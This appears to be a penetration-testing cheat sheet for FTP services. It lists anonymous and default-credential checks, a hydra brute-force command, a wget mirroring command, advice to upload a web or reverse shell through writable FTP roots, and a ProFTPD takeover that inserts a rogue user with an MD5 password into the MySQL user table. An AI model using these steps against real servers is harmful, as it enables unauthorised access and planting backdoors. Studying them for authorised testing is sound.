Common Tests
| Command/Actions | Description |
|---|---|
| ftp://ip:21 | Check for Web Directory Listing |
| anonymous:anonymous, admin:admin, root:root | Check for anonymous access and default/weak credentials |
| wget -m ftp://anonymous:anonymous@ip | Download files from FTP Directory using Wget |
| ftp > get file.txt | Download files using FTP client |
| PUT Allowed | Attempt to upload Reverse Shell / Web Shell |
| hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.xxx.xx ftp | Bruteforce Attack |
Food for Thought
- Have you tried any default credentials (may be specific to FTP version)?
admin:admin
root:root
ftp:ftp
user:system
2. What does the ftproot suggest?
Some cases the FTProot could be a webserver directory, uploading files to the directory can trigger a webshell when accessed via the web application such as :
https://ip/webshell.txt
3. When transferring files, remember to use binary mode
Proftpd
- Default path of Proftpd
/etc/proftpd
2. If obtained access to MySQL db for Proftpd it may be possible to attain access by creating a Proftpd user via MySQL
Create the password:
Make sure “password” uses straight quotes
/bin/echo “{md5}”/bin/echo -n "pwned" | openssl dgst -binary -md5 | openssl enc -base64
Insert the record:
INSERT INTO ftpuser (id, userid, passwd, uid, gid, homedir, shell, count, accessed, modified) VALUES (NULL, 'benoit', '{md5}F5rUXGziy5fPECniEgRugQ==', '1000', '1000', '/', '/bin/bash', '0', '2022-09-27 05:26:29', '2022-09-27 05:26:29');
lktniloc 
Leave a comment